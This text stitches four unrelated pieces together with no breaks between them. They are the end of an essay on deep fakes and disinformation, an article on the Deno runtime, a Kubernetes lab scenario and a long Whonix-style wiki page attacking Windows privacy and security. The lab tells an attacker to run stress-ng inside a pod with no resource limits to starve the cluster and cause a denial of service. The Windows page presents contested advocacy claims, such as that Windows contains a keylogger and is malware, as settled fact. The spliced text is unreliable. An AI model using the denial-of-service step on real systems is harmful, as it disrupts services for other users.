media, disseminated, and discussed widely. Finally, text-based deep-faking where a user can simply use off-the-shelf software to edit a text transcript by inserting new language or delete authentic language has begun a cycle of making deep fakes a household activity. Deep fakes have become a go-to tool in the growing disinformation portfolios of both nation-states and non-state actors. There are serious implications for dealing with the threat of deep fakes and similar technology. First, the potential threat posed by emerging technologies like deep fakes elevate the importance of diplomacy. One could easily imagine a deep fake video that depicts Kim Jong Un or another world leader threatening an attack. This merely reinforces the necessity of diplomats being able to establish contact with other foreign governments, including adversaries, to verify the authenticity, or in most cases quickly discredit deep fake videos designed to inflame tensions. Given the pressure to act and the speed of warfare in the modern era, this means that fake images and videos could have real world consequences. Second, there is a danger of deep fakes becoming so frequently used that governments and individuals develop an aversion to paying close attention, growing numb from the constant barrage of manipulated videos and images. This could prove problematic the rare time that one of these videos is indeed authentic and authorities prove slow to respond. Third, intelligence analysts and others whose mission it is to analyze data and identify trends will suffer because there is now so much more time and effort required to even verify if something is real, which leaves less bandwidth for actual analysis. This is true even despite the development of new tools designed to aid analysts in separating ‘signals from noise.’ Two states, California and Texas, have tried to curb the proliferation of deep fakes by passing laws banning known deceptive videos intended to influence voting in U.S. elections. Maine has a comparable bill under consideration as well. The federal government, however, has not demonstrated a capacity to tackle the challenge of deep fakes in a bipartisan manner. As such, the proliferation of deep fake technology will continue to serve as a disinformation force multiplier. While diplomatic and intelligence solutions to hard national security challenges will be key in confronting deep fakes, there is no silver bullet and any solution must be comprehensive. Only when a mix of technological, regulatory, intelligence, diplomatic, and civil society solutions – including one predicated on increasing the media and digital literacy of all strands of society – are deployed will the challenge of deep fakes and its threat to society be partially mitigated. For tailored research and analysis, please contact: [email protected]
State of the Web: Deno By Jacob Jackson on January 9, 2022 (Updated July 1, 2023) In Ryan Dahl’s talk Ten things I regret about Node, he talked about many problems with Node. These issues include Node’s failure to embrace web standards, security, Node’s way of compiling native modules (GYP), and NPM. Then, he revealed Deno. Deno was a new project that fixed many problems Ryan Dahl had earlier mentioned, along with extra advantages like built-in TypeScript support. Ryan Dahl initially built Deno in Go but later switched to Rust. Since Ryan Dahl first announced Deno, it has made significant progress. 1.0 was released in August 2020, and companies like Slack, Netlify, and GitHub have adopted Deno. In addition, The Deno Company has also released its own edge serverless function platform, Deno Deploy. V8 is a sandboxed language that makes it impossible for code to do something outside of its boundaries. However, Node.js allows access to things like networking and the filesystem inside the sandbox, which removes the security benefits of V8. Even for trusted programs, this can be hurtful because insecure code or malicious dependencies could deal significant damage and steal information. Deno solves with a system of permissions. These permissions make you define precisely what the program can do outside of the sandbox, like filesystem access and environment variables. For example, if you wanted to allow for reading files within the local assets directory, you would run Deno with a command like: deno run --allow-read=./assets Because of these capabilities, you can ensure that your code does not reach outside of its boundaries, increasing security. Because the Node.js and web platforms evolved in parallel and many web APIs came after Node.js versions of them, they have many differences. There are many examples of this, like the module system and HTTP requests. <script> tags and using them from the global window scope. Since HTML and the window were unavailable on the server, Node.js needed a module format. Node.js decided to adopt a form of CommonJS, which was a popular, simple, synchronous module format. However, CommonJS was not native to browsers (you would have to use a library like Browserify), and there were differences between implementations of CommonJS. Years later, in 2016, a new module specification called ECMAScript Modules (ESM) was finalized in ES6. This module specification would work without any libraries in browsers. Additionally, it would solve many problems with CommonJS, like asynchronous module loading and tree shaking. However, it took a while for Node.js to add ESM support, and even after that, ESM adoption in Node.js was not very high, with the majority of NPM packages still only include CommonJS versions. Additionally, Node.js does not have an entirely standards-compliant ESM implementation and differs in things like including .js file extensions. In contrast, Deno only works with entirely standards-compliant ESM. Using one module format makes using Deno a lot simpler for both users and library authors. Speaking from experience, using just ESM is much simpler than including both ESM and CommonJS. Deno also is more straightforward in that it sticks to the standards, so you know that your module code works correctly in browsers. Sending HTTP requests is another area of incompatibility which Deno solves. Node.js allows for HTTP requests through the https standard library functions. However, the modern way of running HTTP requests on the web is through the fetch() API, which is standardized and simpler than http. The most recent versions of Node supports fetch(). However, Node’s fetch() support is limited to very recent versions, so many people have had to turn to using packages like node-fetch for the simplicity of fetch() or cross-fetch for full cross-platform compatibility. This is problematic because it is another dependency needed, and it is not immediately available without importing. However, all versions of Deno support the fetch() API by default, which solves these problems. Currently, this is the biggest problem with Deno and is a big reason why most Node.js developers are not migrating to Deno (this is a nasty problem because if Node.js developers don’t migrate, the ecosystem grows more slowly). There are 6350 modules on deno.land/x, compared to 2 million on NPM. However, many people use other package hosting services (see “Decentralised Module Hosting” above), and most modern web packages should work on Deno. Many Node.js packages should work on Deno, as Deno does include polyfills for Node.js APIs and the ability to load npm modules using the npm: specifier. However, the polyfills are not perfect, and some Node.js packages might not work. Deno is very actively developed, with monthly releases and new features in each release. Deno is even backed by a official company, which can be both good or bad depending on how you look at it. There are more than 600 contributors to Deno, which is growing. Basically, Deno is a very actively maintained project Deno can be deployed pretty widely, although not as widely as Node.js. Deno has ok support for various container services. Deno.land provides an official Docker image for services that support Docker. However, while most popular container services support Deno, the support is often unofficial and not always maintained. Here is a list of tools and resources for running Deno on container services: Serverless is where the Deno company comes in. Their primary commercial offering is Deno Deploy, a serverless edge function runner for Deno scripts. It is conceptually similar to Cloudflare Workers in that it uses V8 Isolates for ultra-fast startup times. The advantage of Deno Deploy is that it includes the Deno API and all of the other features that make Deno so helpful. However, there are still other options that might be better. Here is a list of tools and resources to run Deno on various serverless function providers:
Whe there is no specification of resources in the Kubernetes manifests and not applied limit ranges for the containers. As an attacker we can consume all the resources where the pod/deployment running and starve other resources and cause a DoS for the environment. - To get started with the scenario, navigate to http://127.0.0.1:1236 - This deployment pod has not set any resource limits in the Kubernetes manifests. So we can easily perform the bunch of operations which can consume resources - In this pod we have installed and ready to use utility called stress-ng --vm 2 --vm-bytes 2G --timeout 30s - You can see the differece between while running kubectl top pod hunger-check-deployment-xxxxxxxxxx-xxxxx This attack may not work in some cases like autoscaling, resources restrictions, etc.
Microsoft Windows Hosts Table: Windows Backdoors |User Content Upload to Microsoft||Windows sometimes takes user content, such as documents and uploads it to Microsoft servers. Quote Microsoft: Configure telemetry and other settings in your organization (web archived website) (Underline added.) Media also reported. The Register: Windows 10 telemetry secrets: Where, when, and why Microsoft collects your data [archive] (Underline added.): Quote ZDNet: Windows 10 telemetry secrets: Where, when, and why Microsoft collects your data [archive] (Underline added.): Quote OS researchgate: Call Home: Background Telemetry Reporting in Windows 10 [archive] (Underline added.): Alternative write-up, Scaring: Windows 10 lets Microsoft access your own local files [archive]. In theory it might be possible to disable this behavior but then there have also been cases where these settings have not been honored as documented in chapter Inescapable Telemetry. There is a privacy by policy safeguard implemented at the Microsoft organisational level. Quote "However, before more info is gathered, Microsoft’s privacy governance team, including privacy and other subject matter experts, must approve the diagnostics request made by a Microsoft engineer." However, privacy by policy is not privacy by design (privacy enforced through technology). Generally speaking, there is a history of privacy by policy safeguards being circumvented by malicious employees (insider attack), hacking (outsider attacks) and privacy by policy also fails in case of government requests. Microsoft’s privacy governance team would be circumvented if Microsoft was compelled through a government order. While there exists (to the knowledge of the author) no law that allows the government to compel companies to add new surveillance capabilities, new backdoors to operating systems, Microsoft has an Possibly even orders which Microsoft would never be allowed to talk about due to a gag order [archive]. Microsoft's U.S. National Security Orders Report [archive] states Foreign Intelligence Surveillance Act (FISA) [archive] orders for the time period of July - Dec 2019, 0 - 499 orders seeking disclosure of content with 14,500 - 14,999 Accounts impacted by orders seeking content. Some orders probably related to hosted accounts such the Microsoft live e-mail service or Skype. It is unknown if that might also include user content from Windows. FISA is just one order that includes a secrecy order (gag order) by the U.S. government. Microsoft must also abide by other types of government orders as well as by orders from governments of different countries [archive]. The relevant statement by Microsoft If using this |Encryption||Microsoft has backdoored its disk encryption. But disabling this requires awareness of the issue, skills of using search engines and finding documentation how to do so, and technical skills to disable this privacy intrusion. This is often not the case for non-technical users. (The Tyranny of the Default) |Software Choice and Deletion|| Table: Windows Surveillance Threats Windows 10 comes with a keylogger. Quoting 2015 version of Microsoft: Windows 10 speech, inking, typing, and privacy FAQ [archive]: Note: any deletion from the quote is only a promise. If data was leaked or shared with other parties previously or requested thought government order previously, it would not be deleted. Such data is vulnerable to Keystroke Deanonymization. Quote 2020 Microsoft: Windows 10 speech, inking, typing, and privacy FAQ [archive] (Underline added.): This means Windows is recording the voice of the user and storing it on servers owned by Microsoft. The same website mentions this can be disabled. But disabling this requires awareness of the issue, skills of using search engines and finding documentation how to do so, and technical skills to disable this privacy intrusion. This is often not the case for non-technical users. (The Tyranny of the Default) Quote Microsoft Privacy Statement, Last Updated: March 2021 [archive] (Underline added.) (Bold added.): This sounds rather theoretic, "collect samples" - how many samples? "processed to remove" data "which could be used to reconstruct the original content or associate the input to you" - how well does that processing work? Such data is vulnerable to Voice Deanonymization. |Telemetry and Personal Data|| |Windows Error Reporting (WER) and Core Dumps Privacy Issues|| Windows User Freedom Restrictions A number of conscious decisions by Microsoft severely limit user freedoms. Table: Windows User Freedom Threats The German government, Ministry of Economics, Federal Office for Information Security (BSI) does not trust Microsoft Windows. What was it that ZEIT ONLINE needed to redact? Quote A BSI-2i.pdf German government internal documents leaked on wikileaks [archive] (DeepL translated ): Heise: German authorities are losing control over critical IT systems (German language, use DeepL and/or Google Translate) : |Forced Updates||Microsoft has a history of updating software without permission [archive]. While configurable update reminders are good for those who forget to regularly update, forced updates are problematic for those that do not wish to. This Windows issue has not been foreseen. To the knowledge of the author there where no popular "really disable all Windows updates" instructions. By comparison such an issue is unlikely to happen with Debian (and many derivatives) based operating systems (and other Freedom Software Linux distributions). On Windows there was no real way to check which code will run when. Or at least, for practical purposes, nobody did reverse engineering and documented that. For example on Debian (based) operating systems by default their default package manager APT is fully Open Source. But also without reading the source code, it's behavior is much more predictable. Software sources are defined in easily human readable files such as |Tiered Stability (Updates Testing)||Windows forces lower-paying customers to install new updates and gives higher-paying customers the option of whether or not to adopt them. Quote [archive]: |Forced Telemetry into C++ Binaries| Microsoft has a history of informing adversaries of bugs before they are fixed. Microsoft reportedly gives adversaries security tips [archive] (archive.is [archive]) on how to crack into Windows computers. Microsoft Corp. (MSFT), the world’s largest software company, provides intelligence agencies with information about bugs in its popular software before it publicly releases a fix, according to two people familiar with the process. Redmond, Washington-based Microsoft (MSFT) and other software or Internet security companies have been aware that this type of early alert allowed the U.S. to exploit vulnerabilities in software sold to foreign governments, according to two U.S. officials. Microsoft doesn't ask and can't be told how the government uses such tip-offs, said the officials, who asked not to be identified because the matter is confidential. Frank Shaw, a spokesman for Microsoft, said those releases occur in cooperation with multiple agencies and are designed to give government "an early start" on risk assessment and mitigation Although our preference is to release fixes for publicly undisclosed bugs as soon as they become available, this may be postponed at the request of the reporter or an affected party for up to 7 calendar days from the start of the release process, with an exceptional extension to 14 calendar days if it is agreed that the criticality of the bug requires more time. The only valid reason for deferring the publication of a fix is to accommodate the logistics of QA and large scale rollouts which require release coordination. While embargoed information may be shared with trusted individuals in order to develop a fix, such information will not be published alongside the fix or on any other disclosure channel without the permission of the reporter. This includes but is not limited to the original bug report and followup discussions (if any), exploits, CVE information or the identity of the reporter. In other words our only interest is in getting bugs fixed. All other information submitted to the security list and any followup discussions of the report are treated confidentially even after the embargo has been lifted, in perpetuity. Fixes for sensitive bugs, such as those that might lead to privilege escalations, may need to be coordinated with the private <[email protected]> mailing list so that distribution vendors are well prepared to issue a fixed kernel upon public disclosure of the upstream fix. Distros will need some time to test the proposed patch and will generally request at least a few days of embargo, and vendor update publication prefers to happen Tuesday through Thursday. When appropriate, the security team can assist with this coordination, or the reporter can include linux-distros from the start. The crucial difference between Microsoft bug embargoes and Linux bug embargoes is that Microsoft notifies intelligence agencies which are then known to exploit vulnerabilities while the Linux kernel security team has a much more transparent bug embargo process where trusted parties, huge Linux distributions receive an early notification for the purpose of wide availability of the software upgrade containing the fix before to prevent wide exploitation by attackers in the wild. - Open Source, Freedom Software versus - proprietary, closed source, precompiled software. are totally different development models. Both development models have advantages and disadvantages. The case for Open Source, Freedom Software is made on the Avoid Non-Freedom Software wiki page. However, Microsoft Windows has none of the advantages of Open Source, Freedom Software but also cannot fully take advantage of security through obscurity either. Part of the Shared Source Initiative [archive] is the Government Security Program [archive]. Quote ZDNet [archive]: Microsoft's Shared Source Initiative [archive] makes source code available to "qualified customers, enterprises, governments, and partners for debugging and reference purposes". There's almost no information on the company's website about their Government Security Program [archive] (GSP). Just two sentences. But the first of those sentences notes that requests might come from "local, state, provincial, or national governments or agencies". When the GSP was launched back in 2003, however, Microsoft was happy to tell the media that Windows source code was made available to a number of governments and international organistions, including Russia, NATO, the UK, and China. Another report said that Australia, Austria, Finland, Norway, Taiwan, and Turkey were also on the list. Simplified summary: Independent security researchers don't have access to the source code but huge groups of people from of which some you probably do not trust do have the advantage over you. The only motivation for sharing the source code is to get regulatory approval for deployment in foreign government networks that demand certain assurances for accessing their markets. This has nothing to do with empowering third parties or giving them the choice and freedom to modify the software or share it with others. The fact that there is no way to completely remove or disable telemetry requires further consideration. For instance, non-enterprise editions do not permit anyone to completely opt-out of the surveillance "features" [archive] of Windows 10. Quote Even when told not to, Windows 10 just can’t stop talking to Microsoft [archive]. Quote Windows 10 Sends Your Data 5500 Times Every Day Even After Tweaking Privacy Settings [archive] CheesusCrust also disabled every single tracking and telemetry features in the operating system. He then left the machine running Windows 10 overnight in an effort to monitor the connections the OS is attempting to make. Eight hours later, he found that the idle Windows 10 box had tried over 5,500 connections to 93 different IP addresses, out of which almost 4,000 were made to 51 different IP addresses belonging to Microsoft. Even if some settings are tweaked to limit this behavior, it is impossible to trust those changes will be respected. Even the Enterprise edition was discovered to completely ignore privacy settings and anything that disables contact with Microsoft servers. Any corporation which forces code changes on a user's machine, despite Windows updates being turned off many times before, is undeserving of trust. Windows 10 updates have been discovered to frequently reset or ignore telemetry privacy settings. Microsoft backported this behavior to Windows 7 and 8 [archive] for those that held back, so odds are Windows users are already running it. Forfeited Privacy Rights By now the reader should be convinced that just by using any version of Windows, the right to privacy is completely forfeited. Windows is incompatible with the intent of Whonix and the anonymous Tor Browser, since running a compromised Windows host shatters the trusted computing base which is part of any threat model. Privacy is inconceivable if any information that is typed or downloaded is provided to third parties, or programs which are bundled as part of the OS regularly "phone home" by default [archive]. Targeted Malicious Upgrades Microsoft Windows is not designed to be resistant to targeted malicious software upgrades of the Windows operating system or applications from Windows store. Targeted malicious software upgrade means singling out specific users and shipping malicious upgrades to these select users only. Most users are using a Windows Live ID since that is encouraged by Windows and their real names and IP addresses. When installing/updating applications using the Microsoft Store, Microsoft knows the Windows Live ID, therefore also the real name and IP address of the user. It follows that a coerced or compromised Microsoft Store could single out users and ship malicious software that includes malware with features such as remote control, remote view, file upload and download, microphone and web camera snooping, keyboard logging and so forth. This is the same situation for any OS shipped with corporate controlled walled garden app store like Apple, Google and Amazon. With knowledge of Microsoft existing privacy intrusive behavior as documented elsewhere on this page, it seems sane to assume that the same applies to Microsoft Update. - Most Linux distributions usually do not require an e-mail based login to receive upgrades. Users can still be singled out by IP addresses unless users opt-in for using something such as apt-transport-tor which is not the default. - In case of Whonix And Kicksecure, all upgrades are downloaded over Tor. There is no way for the server to ship legit upgrade packages to most users while singling out specific users for targeted attacks. Opinion by GNU Project The GNU Project opinion [archive] is that Windows is "Malware", due to the threats posed to personal freedoms, privacy and security, meaning the software is designed to function in ways that mistreat or harm the user. Interpretation of Opinion by GNU Project: Word definitions: Spyware is a type of malware. A wide variety of malware types exist, including computer viruses, worms, Trojan horses, ransomware, spyware, adware, rogue software, wiper and scareware. If that definition is accepted... It therefore follows, if one agrees that "Windows is Spyware", it then logically follows "Windows is also Malware". This is to explain the GNU Project opinion of calling Windows "Malware". Windows is malware by definition because of what it does. Individuals trusting Microsoft as an entity with all the data it collects by default doesn't change that determination. Opinion by Free Software Foundation Microsoft uses draconian law to put Windows, the world's most-used operating system, completely outside the control of its users. Neither Windows users nor independent experts can view the system's source code, make modifications or fixes, or copy the system. This puts Microsoft in a dominant position over its customers, which it takes advantage of to treat them as a product [archive]. Microsoft's willingness to consult with adversaries and provide zero days [archive] before public fixes are announced logically places Windows users at greater risk, especially since adversaries buy security exploits from software companies [archive] to gain unauthorized access [archive] into computer systems. Even the Microsoft company president has harshly criticized adversaries for stockpiling vulnerabilities [archive] that when leaked, led to the recent ransomware crisis world-wide. This is elaborated in chapter Adversary Collaboration. - Not upload user data to Microsoft servers. - Minimize data stored on, available to servers of Microsoft. (Windows Surveillance) - Use end-to-end encryption whenever possible. - Be resilient to targeted malicious upgrade attacks by not linking software installation/upgrading to a Windows ID and/or providing an option to download software over the Tor anonymity network (or hypothetically a next generation anonymity network developed by Microsoft). - Not upload full disk encryption keys to Microsoft servers (see chapter Windows Backdoors, category Encryption). Such security standards are well affordable because since Microsoft makes billions of profit as well as very realistic since some Freedom Software Linux distributions already implemented these. Due to Microsoft's restrictive, proprietary licensing policy for Windows, there are no legal software projects that are providing a security-enhanced Windows software fork [archive]. There are security-enhanced Windows software fork(s) but these are illegal, violating the copyright of Microsoft and provided by anonymous developers. In contrast, the Linux community has multiple Freedom Software Linux variants that are strongly focused on security, like Qubes OS [archive]. Microsoft provides Tyrant Security. Not Freedom Security. (Tyrant Security vs Freedom Security) Windows comes with some innovative security technologies, however privacy and user freedom is terrible. Security and privacy have a strong connection. Quote Bruce Schneier Security vs. Privacy [archive], The Value of Privacy [archive]: There is no security without privacy. I equate privacy with security because they are very much related in the real world especially for whistleblowers. Windows Historic Insecurity Microsoft updates also use weak cryptographic verification methods such as MD5 and SHA-1. In 2009, the CMU Software Engineering Institute stated that MD5 "...should be considered cryptographically broken and unsuitable for further use". In 2012, the Flame malware exploited the weaknesses in MD5 to fake a Microsoft digital signature. Before Windows 8, there was no central software repository comparable to Linux where software could be downloaded safely. This means a large segment of the population remains at risk, since many Windows users [archive] are still running Windows 7. Windows Software Sources On the Windows platform, a common way to install additional software is to search the Internet and install the relevant program. This is risky, since many websites bundle software downloads with adware, or worse malware. Even if software is always downloaded from reputable sources, they commonly act in very insecure ways. For example, if Mozilla Firefox is downloaded from a reputable website like chip.de, then until recently, the download would have taken place over an insecure, plain http connection. In that case, it is trivial for ISP level adversaries, Wi-Fi providers and others to mount man-in-the-middle attacks and to inject malware into the download. But even if https is used for downloads, this would only provide a very basic form of authentication. To keep a system secure and free of malware it is strongly recommended to always verify software signatures. However, this is very difficult, if not impossible for Windows users. Most often, Windows programs do not have software signature files (OpenPGP / gpg signatures) that are normally provided by software engineers in the GNU/Linux world. Tools for software digital signature verification are not installed by default on the Windows platform. Neither SignTool nor gpg4win are installed by default on the Windows platform. These could be manually installed but there is a bootstrap issue. These tools itself would have to be downloaded over https, i.e. only with a very basic form of authentication. In contrast, on the Linux platform usually the GnuPG software digital signature verification tool is installed by default. For these reasons it is safe to assume that virtually nobody using a Windows platform is regularly benefiting from the strong authentication that is provided by software signature verification. Windows 10 App Store does not suffer from this issue and does software signature verification but many applications are not available form Windows App Store. In the Windows ecosystem, the culture is software signature verification is less widespread. In contrast, most Linux distributions provide software repositories. For example, Debian and distributions based on Debian are using apt-get. This provides strong authentication because apt-get verifies all software downloads against the Debian repository signing key. Further, this is an automatic, default process which does not require any user action. Apt-get also shows a warning should there be attempts to install unsigned software. Even when software is unavailable in the distribution's software repository, in most cases OpenPGP / gpg signatures are available. In the Linux world, it is practically possible to always verify software signatures. No Ecosystem Diversity Advantage The popularity of Windows platforms on desktops actually the risk, as attackers target the near monocultural operating system environment with regularity. A security bug is usually exploitable on many versions of Windows run anywhere, making them known in security terms as a "class break". For example: - The Wanna Decryptor ransomware attack [archive] spreading the globe at the time of writing is solely focused on Windows platforms. - Flaws in Internet Explorer and Edge [archive] have previously allowed attackers to retrieve Microsoft account credentials. - Point-of-sale terminals running Windows were previously taken over in order to collect customers' credit card numbers [archive]. Windows source code is unavailable for public review and build by independent third parties. Microsoft Windows has none of the advantages of Open Source, Freedom Software but also cannot fully take advantage of security through obscurity either. This point is made in chapter shared source. There is no public issue tracker for Microsoft Windows where any reasonable user is allowed to post or reply. There is a public list of vulnerabilities [archive] but without public discussion among developers and/or users. Microsoft's internal issue tracker is private, unavailable for the public even for reading. The ability of the public of getting insights into the planning, thought process of Microsoft, participation in the development of Windows is much more limited. This is the case for many closed source, proprietary software projects. The community cannot participate as much in development. In comparison for Open Source projects, issue tracker are most often public for everyone to post and reply (with exception of security issues under embargo until fixed). When users are having issues and searching for advice, often the advice is to "reinstall Windows". Due to the closed source nature of windows, it's far more difficult to analyze issues and provide bug fixes and workarounds. Sometimes reverse engineering is cited as an alternative to the unavailability of Window's source code to the general public. Reverse engineering however is far more difficult. For example, the forced updates and forced upgrades issues, Windows ignoring the user's automatic update settings (documented in chapter Windows User Freedom Restrictions) had not been foreseen and published by anyone doing reverse engineering. Users were taken by surprise. Using Earlier Windows Versions is no good Alternative When users learn about shortcoming, anti-features, spyware features of Windows they often consider as an alternative to not upgrade to a newer version of Windows or to downgrade to an earlier version of Windows. This is not a solid plan for the future since security support for older versions of Windows is being dropped and without security support, newly found security vulnerabilities will remain unfixed. - Microsoft has dropped support for Windows 7 and 8 on recent processors [archive] following the release of Windows 10. - Microsoft has made Windows 7 and 8 non-functional on certain new computers [archive], compelling a switch to Windows 10 for many people. For example, support has been dropped for all future Intel [archive], AMD and Qualcomm CPUs [archive]. - Microsoft cuts off support for specific platforms (like XP [archive]) and software such as popular Internet Explorer versions [archive], after a software dependency has developed. Microsoft has been hostile against Freedom Software. Microsoft is a patent troll. Microsoft claimed that Linux infringed its intellectual property. Microsoft experienced backslash over that claim, never substantiated this claim, sued anyone or apologized. References: - now defunct website Show Us The Code, archived: http://web.archive.org/web/20071120042104/http://showusthecode.com/responses.htm [archive] - internet search term: "microsoft" "Show Us The Code" - https://www.redhat.com/en/blog/microsoft-and-patent-trolls [archive] - http://www.openinventionnetwork.com/ [archive] - https://www.eff.org/deeplinks/2015/12/stupid-patent-month-microsofts-design-patent-slider [archive] - Microsoft used DMCA (Digital Millenium Copyright Act) to shut down reverse engineering of Skype. See DMCA notice received by and published by github [archive]. The Tyranny of the Default “‘The tyranny of the default’ [is] the expression I like to use for: we know most users don’t go in and change things. They just assume that someone smarter than them chose the settings that are best for them, and so they say ‘YES’ a lot when they’re asked questions. What that means is that if it’s enabled by default, it’ll tend to stay on.” Any anti-features of Windows such as telemetry cannot be excused by "but it can be disabled". That's a workaround at best. Not a fix. Fact remains, for most users, if it’s enabled by default, it’ll tend to stay on. Changing defaults requires awareness of the issue, skills of using search engines and finding documentation how to do so, and technical skills to change the default. This is often not the case for non-technical users. Even technical users might forget it in some situations such after re-installation. Therefore default settings matter. - "reinstall Windows": When users are having issues and searching for advice, often the advice is to "reinstall Windows". Due to the closed source nature of windows, it's far more difficult to analyze issues and provide bug fixes and workarounds. - Windows update often take a long time and require multiple reboots. - User runs Windows update. - Windows downloads updates and installs. - Reboot is required, the user reboots, shutdown takes a long time since Windows is finalizing some updates. - Boot takes a long time since Windows is finalizing some updates. - Windows update reports further updates. Back to 1. - Repeat a few times. By comparison, for example for Debian based distributions a single " sudo apt-get update && sudo apt-get dist-upgrade" is sufficient to download and install all updates. No extra time is required for shutdown or the next boot. No further updates are required right after reboot. - Windows displays advertisements [archive] for Microsoft products and those of its partners. - Windows inserts advertisements inside of File Explorer [archive] to nag about paid subscriptions. Windows is less flexible. While with Linux distribution it's easily possible to install them on USB or to swap a hard drive installed in one computer and boot it inside a replacement computer, these are major challenges for Windows users. It's hard to modify Windows. For example, Qubes Windows Tools for Windows 10 are still not ready. Freedom Software Superiority Based on the preceding section and analysis, it is strongly recommended to learn more about GNU/Linux and install a suitable distribution to safeguard personal rights to security and privacy. Otherwise, significant effort is required to play "whack-a-mole" disabling Windows anti-features, which routinely subjects users to surveillance, limits choice, purposefully undermines security, and harasses via advertisements, forced updates/forced upgrades, and so on. See also Avoid Non-Freedom Software. Can Windows 10 be secure for huge enterprise level customers? In theory, maybe. These customers might have access to Windows Shared Source which might [archive] even be complete enough to building Windows from source code. Who knows. It cannot be known for sure due to the high requirements [archive] get get access to Windows source code and the requirement of singing a non-disclosure agreement (NDA). Even if the author of this page did know, it could not be published here due to the NDA requirement. Such customers might even be able to escape the otherwise for mere mortals Inescapable Telemetry, to build their own Windows installer ISO and Windows updates from Windows source code. In practice, it is foolish to trust any version coming from an entity that has proved beyond doubt that is not trustworthy. Much better to move on and instead use sustainable alternatives. Can Windows 10 be secure for laymen users? Probably not. Due to Windows Error Reporting (WER) and Core Dumps Privacy Issues, telemetry, spyware and keylogger (see chapter Windows Surveillance) too much private information including user data is ending up on Microsoft servers which is then in part harvested by any government with thousands of employees which Mircosoft is compelled to cooperate with. Such data can then be used in parallel construction [archive] (evidence laundering), circumvention of constitutional protections against protection from unreasonable searches and seizures. Security updates are necessary for any operating system but he issue with Microsoft is they tend to sneak in things other than what users can reasonably expect. In the past at least they made changes to the update system to still phone home even if it was disabled. Examples include Inescapable Telemetry and forced updates/upgrades. Windows officially admits their data mining activity and gives users so-called options to “choose” what they share. Third parties have uncovered time and time again, these user choices are ignored and there is no way to disable data gathering completely. Does Windows result in a world wide net gain or net loss of privacy? A proprietary security hardened Windows that resists third party spyware + includes data snooping in its core = net loss of end user freedom/privacy and security risk as NSA has been know to use windows error reporting for aiding exploitation. A less security hardened Freedom Software operating system might more vulnerable to active attacks + no privacy invasive code include by default = net gain of privacy by default as nothing is being reported anywhere unless targeted attacks are deployed. - Basic Host Security - Advanced Host Security - Miscellaneous Threats to User Freedom - Avoid Non-Freedom Software - Tyrant Security vs Freedom Security - Why Whonix ™ is Freedom Software - Unsubstantiated Conclusions - Whonix ™ Policy on Non-Freedom Software - With the ability to be legally allowed to actually talk about. I.e. without non-disclosure agreement (NDA). - modified by author: added link to web archive with quote from 2015 - https://www.government.nl/binaries/government/documents/publications/2019/06/11/dpia-windows-10-enterprise-v.1809-and-preview-v.-1903/DPIA+Windows+10+version+1.5+11+June+2019.pdf [archive] - Microsoft Privacy Statement for Error Reporting [archive] - https://rcpmag.com/articles/2002/10/03/microsoft-error-reporting-drives-bug-fixing-efforts.aspx [archive] - https://www.forcepoint.com/blog/security-labs/are-your-windows-error-reports-leaking-data [archive] So heißt es in einem internen Papier aus dem Wirtschaftsministerium von Anfang 2012: "Durch den Verlust der vollen Oberhoheit über Informationstechnik" seien "die Sicherheitsziele 'Vertraulichkeit' und 'Integrität' nicht mehr gewährleistet." An anderer Stelle stehen Sätze wie: "Erhebliche Auswirkungen auf die IT-Sicherheit der Bundesverwaltung können damit einhergehen." Die Schlussfolgerung lautet dementsprechend: "Der Einsatz der 'Trusted-Computing'-Technik in dieser Ausprägung … ist für die Bundesverwaltung und für die Betreiber von kritischen Infrastrukturen nicht zu akzeptieren." Bei der Verhandlungsführung kann bezogen auf die TPM-Nutzung daraufhingewiesen werden, dass nicht nur die Bundesregierung den nicht selbst kontrollierten Einsatz von TPMs kritisch sieht, sondern auch weite Teile der deutschen Industrie, insbesondere in Kritischen Infrastrukturen. Daher argumentiert Microsoft damit, dass sie selbst die Kontrolle über UEFI „Secure Boot" benötigen, um für den Eigentümer UEFI „Secure Boot" sicher zu verwalten. Aus Sicht des BSI ist der Aufwand für eine selbst kontrollierte Konfiguration von UEFI „Secure Boot" zwar derzeit hoch, aber insbesondere in Einsatzbereichen mit hohem Schutzbedarf oder in Kritischen Infrastrukturen dringend geboten. Einerseits verlangt die Bundesregierung „uneingeschränkte Kontrollierbarkeit“ von Computern, die kritische Infrastrukturen am Laufen halten – also Atomkraftwerke, Wasser-, Energie und Verkehrsnetze. Andererseits tun die zuständigen Behörden nichts, um die bereits an Intel und Microsoft verlorene Kontrolle zurückzuerlangen. - Bundesamt für Sicherheit in der Informationstechnik - https://www.techrepublic.com/index.php/blog/it-news-digest/microsoft-admits-to-stealth-updates/ [archive] sudo apt update ... Get:5 tor+https://deb.debian.org/debian buster-backports InRelease [46.7 kB] Get:6 tor+https://deb.debian.org/debian-security buster/updates InRelease [65.4 kB] Get:7 tor+https://deb.debian.org/debian buster-updates InRelease [51.9 kB] Hit:8 tor+https://deb.debian.org/debian buster InRelease ... sudo apt dist-upgrade Reading package lists... Done Building dependency tree Reading state information... Done Calculating upgrade... Done The following packages will be upgraded: anon-apt-sources-list anon-icon-pack apparmor-profile-dist apparmor-profile-torbrowser bootclockrandomization damngpl dist-base-files gpg-bash-lib hardened-malloc hardened-malloc-kicksecure-enable helper-scripts kicksecure-base-files kicksecure-cli kicksecure-dependencies-cli msgcollector msgcollector-gui open-link-confirmation repository-dist sdwdate secbrowser security-misc tb-default-browser tb-starter tb-updater timesanitycheck tor tor-geoipdb usability-misc vm-config-dist whonix-initializer 30 upgraded, 0 newly installed, 0 to remove and 0 not upgraded. Need to get 5,957 kB of archives. After this operation, 732 kB of additional disk space will be used. Do you want to continue? [Y/n] - https://www.theguardian.com/technology/2015/sep/11/microsoft-downloading-windows-1 [archive] - https://www.computerworld.com/article/3012278/microsoft-sets-stage-for-massive-windows-10-upgrade-strategy.html [archive] - https://web.archive.org/web/20170609221304/https://forums.whonix.org/uploads/default/original/2X/0/004857ec71ff2e4b23c88bf596b6142373fe2879.jpg [archive] - https://web.archive.org/web/20071011010707/http://informationweek.com/news/showArticle.jhtml?articleID=201806263 [archive] - https://archive.fo/LffTy [archive] - https://arstechnica.com/information-technology/2015/07/windows-10-updates-to-be-automatic-and-mandatory-for-home-users/ [archive] - http://voices.washingtonpost.com/securityfix/2007/09/microsofts_stealth_update_come.html [archive] - https://www.zdnet.com/blog/hardware/confirmation-of-stealth-windows-update/779 [archive] - https://community.spiceworks.com/topic/1535835-win-10-update-resets-privacy-again [archive] - This is especially true for users of Tor, who are regularly targeted in this fashion. - https://en.wikipedia.org/wiki/MD5#cite_note-11 [archive] - https://arstechnica.com/security/2012/06/flame-crypto-breakthrough/ [archive] - 